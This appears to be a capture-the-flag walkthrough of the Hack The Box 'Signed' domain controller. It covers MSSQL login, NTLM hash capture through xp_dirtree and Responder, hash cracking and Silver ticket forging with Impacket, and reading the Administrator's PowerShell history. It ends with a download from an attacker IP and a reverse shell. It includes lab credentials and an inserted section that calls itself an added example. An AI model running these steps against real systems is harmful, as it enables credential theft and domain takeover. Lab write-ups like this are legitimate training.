Foothold
Sm230#C5NatH
❯ netexec mssql 10.10.11.90 -u scott -p 'Sm230#C5NatH' --local-auth
MSSQL 10.10.11.90 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:SIGNED.HTB)
MSSQL 10.10.11.90 1433 DC01 [+] DC01\scott:Sm230#C5NatH
❯ impacket-mssqlclient -p 1433 scott:'Sm230#C5NatH'@10.10.11.90
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (scott guest@master)>
SQL (scott guest@master)> enum_users
UserName RoleName LoginName DefDBName DefSchemaName UserID SID
------------------ -------- --------- --------- ------------- ---------- -----
dbo db_owner sa master dbo b'1 ' b'01'
guest public NULL NULL guest b'2 ' b'00'
INFORMATION_SCHEMA public NULL NULL NULL b'3 ' NULL
sys public NULL NULL NULL b'4 ' NULL
No xp_cmdshell :(
SQL (scott guest@master)> enable_xp_cmdshell
ERROR(DC01): Line 105: User does not have permission to perform this action.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC01): Line 105: User does not have permission to perform this action.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
Not much in the Database department
SQL (scott guest@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
sudo responder -I tun0
SQL (scott guest@master)> xp_dirtree \\10.10.14.17\adot8\
subdirectory depth file
------------ ----- ----

hashcat -m 5600 mssqlsvc.hash ~/rockyou.txt -O

mssqlsvc:purPLE9795!@
❯ netexec mssql 10.10.11.90 -u mssqlsvc -p 'purPLE9795!@'
MSSQL 10.10.11.90 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:SIGNED.HTB)
MSSQL 10.10.11.90 1433 DC01 [+] SIGNED.HTB\mssqlsvc:purPLE9795!@
❯ impacket-mssqlclient -p 1433 mssqlsvc:'purPLE9795!@'@10.10.11.90 -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc guest@master)>
SQL (SIGNED\mssqlsvc guest@master)> SELECT r.name AS role, m.name AS member FROM sys.server_principals r JOIN sys.server_role_members rm ON r.principal_id = rm.role_principal_id JOIN sys.server_principals m ON rm.member_principal_id = m.principal_id WHERE r.name = 'sysadmin';
role member
-------- -------------------------
sysadmin sa
sysadmin SIGNED\IT
sysadmin NT SERVICE\SQLWriter
sysadmin NT SERVICE\Winmgmt
sysadmin NT SERVICE\MSSQLSERVER
sysadmin NT SERVICE\SQLSERVERAGENT
We'll have to forge a Silver ticket to become a sysadmin: a ticket whose PAC puts mssqlsvc in the IT group, which holds the sysadmin role.
SQL (SIGNED\mssqlsvc guest@master)> SELECT master.sys.fn_varbintohexstr(SUSER_SID('SIGNED\IT'));
----------------------------------------------------------
0x0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000
SQL (SIGNED\mssqlsvc guest@master)> SELECT master.sys.fn_varbintohexstr(SUSER_SID('SIGNED\mssqlsvc'));
----------------------------------------------------------
0x0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000
SQL (SIGNED\mssqlsvc guest@master)>
Chat helped me with this one lol
#!/usr/bin/env python3
import struct
import binascii
import argparse

def binary_sid_to_string(binary_sid_hex):
    # Remove leading 0x if present and convert to bytes
    binary_sid_hex = binary_sid_hex.strip()
    if binary_sid_hex.startswith("0x") or binary_sid_hex.startswith("0X"):
        binary_sid_hex = binary_sid_hex[2:]
    binary_sid = binascii.unhexlify(binary_sid_hex)
    # Parse SID structure: revision (1 byte), sub-authority count (1 byte),
    # 48-bit big-endian identifier authority, then N little-endian 32-bit sub-authorities
    revision = binary_sid[0]
    sub_authority_count = binary_sid[1]
    identifier_authority = struct.unpack('>Q', b'\x00\x00' + binary_sid[2:8])[0]
    sub_authorities = struct.unpack('<' + 'I' * sub_authority_count, binary_sid[8:8 + 4 * sub_authority_count])
    # Build SID string (S-revision-authority-sub1-sub2-...)
    sid_str = f'S-{revision}-{identifier_authority}'
    for sa in sub_authorities:
        sid_str += f'-{sa}'
    return sid_str

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Convert a binary MSSQL SID to string format.")
    parser.add_argument("-i", "--input", required=True, help="Binary SID in hex format (e.g., 0x010500...)")
    args = parser.parse_args()
    try:
        sid_string = binary_sid_to_string(args.input)
        print(sid_string)
    except Exception as e:
        print("Error converting SID:", e)

S-1-5-21-4088429403-1159899800-2753317549-1105
S-1-5-21-4088429403-1159899800-2753317549-1103

Domain SID: S-1-5-21-4088429403-1159899800-2753317549
NTLM hash: EF699384C3285C54128A3EE1DDB1A0CC
Groups: 1105, 1103, 512, 519
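To show where the domain SID and the RIDs above come from, here is an added example (my own code, not part of the original writeup) that decodes the two SUSER_SID() values returned by the server, rebuilds them into the binary layout as a round-trip check, and splits each into its domain SID and RID. Function names are my own; the only inputs are the two hex strings already shown on the page.

```python
#!/usr/bin/env python3
"""Decode / encode Windows SIDs and split them into domain SID + RID.

Added example, not part of the original writeup. Function names are
my own; the two hex inputs are the SUSER_SID() values shown above."""
import struct

# Binary SIDs returned by SUSER_SID() for SIGNED\IT and SIGNED\mssqlsvc (from the page)
IT_SID_HEX = "0x0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000"
MSSQLSVC_SID_HEX = "0x0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000"


def sid_to_string(binary_sid_hex: str) -> str:
    """Decode the binary SID layout into the familiar S-1-5-21-... string.

    Layout: revision (1 byte), sub-authority count (1 byte),
    identifier authority (6 bytes, big-endian), then N 32-bit
    little-endian sub-authorities."""
    hexpart = binary_sid_hex.strip()
    if hexpart[:2] in ("0x", "0X"):
        hexpart = hexpart[2:]
    raw = bytes.fromhex(hexpart)
    if len(raw) < 8:
        raise ValueError("SID too short")
    revision, count = raw[0], raw[1]
    if len(raw) != 8 + 4 * count:
        raise ValueError("SID length does not match its sub-authority count")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack("<%dI" % count, raw[8:])
    return "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subs))


def string_to_sid(sid: str) -> bytes:
    """Inverse of sid_to_string: rebuild the binary layout from the string."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("not a SID string")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)])
            + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def split_domain_rid(sid: str) -> tuple:
    """Split a domain principal SID into (domain SID, RID).

    The last sub-authority is the RID; everything before it identifies the
    domain, which is what ticketer's -domain-sid expects."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


def derive_ticket_params(*sid_hexes):
    """Decode several binary SIDs, check they share one domain SID and
    return (domain_sid, [rid, ...]) in input order."""
    decoded = [split_domain_rid(sid_to_string(h)) for h in sid_hexes]
    domains = {d for d, _ in decoded}
    if len(domains) != 1:
        raise ValueError("SIDs come from different domains: %s" % sorted(domains))
    return domains.pop(), [rid for _, rid in decoded]


if __name__ == "__main__":
    for h in (IT_SID_HEX, MSSQLSVC_SID_HEX):
        s = sid_to_string(h)
        assert string_to_sid(s).hex() == h[2:].lower()  # round trip
        print(s, "->", split_domain_rid(s))
    print(derive_ticket_params(IT_SID_HEX, MSSQLSVC_SID_HEX))
```

The length check matters: a hex string that is truncated or padded silently mis-parses under a plain struct.unpack, so the sub-authority count byte is compared against the actual length before decoding.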
❯ impacket-ticketer -nthash EF699384C3285C54128A3EE1DDB1A0CC -domain SIGNED.HTB -groups 1105,512,519 -spn mssqlsvc/DC01.SIGNED.HTB:1433 -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -user-id 1103 mssqlsvc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for SIGNED.HTB/mssqlsvc
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in mssqlsvc.ccache
❯ export KRB5CCNAME=/home/adot/htb/signed/mssqlsvc.ccache
❯ impacket-mssqlclient -p 1433 -k -no-pass DC01.SIGNED.HTB
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc dbo@master)>

SQL (SIGNED\mssqlsvc dbo@master)> select x from OpenRowset(BULK 'C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt',SINGLE_CLOB) R(x)


Administrator:Th1s889Rabb!t

PS C:\Programdata> iwr 10.10.14.17/RunasCs.exe
PS C:\Programdata> .\RunasCs.exe Administrator Th1s889Rabb!t powershell.exe -r 10.10.14.17:443
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-57be0$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2532 created in background.
